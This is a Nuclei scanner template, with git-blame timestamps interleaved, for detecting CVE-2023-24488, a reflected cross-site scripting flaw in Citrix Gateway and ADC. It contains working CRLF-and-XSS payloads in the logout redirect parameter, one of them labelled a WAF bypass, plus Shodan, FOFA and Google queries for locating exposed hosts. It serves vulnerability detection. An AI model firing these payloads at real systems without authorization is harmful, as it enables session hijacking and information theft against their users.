nuclei-templates/http/cves/2023/CVE-2023-24488.yaml

61 lines
2.4 KiB
YAML
Raw Normal View History

id: CVE-2023-24488
info:
name: Citrix Gateway and Citrix ADC - Cross-Site Scripting
2023-07-04 04:29:56 +00:00
author: johnk3r,DhiyaneshDk
severity: medium
description: |
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
reference:
- https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2023-24488
- https://twitter.com/infosec_au/status/1674786106381070342
2023-07-04 04:29:56 +00:00
- https://twitter.com/bxmbn/status/1675250259608449026
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-24488
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.05227
epss-percentile: 0.93007
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: citrix
product: gateway
2023-09-06 11:43:37 +00:00
shodan-query: title:"Citrix Gateway"
2024-05-31 19:23:20 +00:00
fofa-query: title="citrix gateway"
google-query: intitle:"citrix gateway"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,citrix,xss,adc
http:
- method: GET
path:
2023-07-04 04:29:56 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'
2023-07-04 08:54:43 +00:00
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'
2023-07-04 08:54:43 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-07-04 04:29:56 +00:00
matchers-condition: and
matchers:
2023-07-04 04:29:56 +00:00
- type: word
part: body
words:
- <body x='&'onload="(alert)('citrix akamai bypass')">
2023-07-04 08:54:43 +00:00
- <script>alert(document.domain)</script>
condition: or
- type: word
part: body
words:
2023-07-04 04:29:56 +00:00
- "Content-Type: text/html"
- type: status
status:
- 302
# digest: 4a0a00473045022100b9fde4e5a98c376353cf072f935c8a0b049c84919585134c7a52d0eb9623953f022000d7a1f8d0dad24a1042be1bc800c8bf3322dcd62b54fea3327e0face361a222:922c64590222798bb761d5b6d8e72950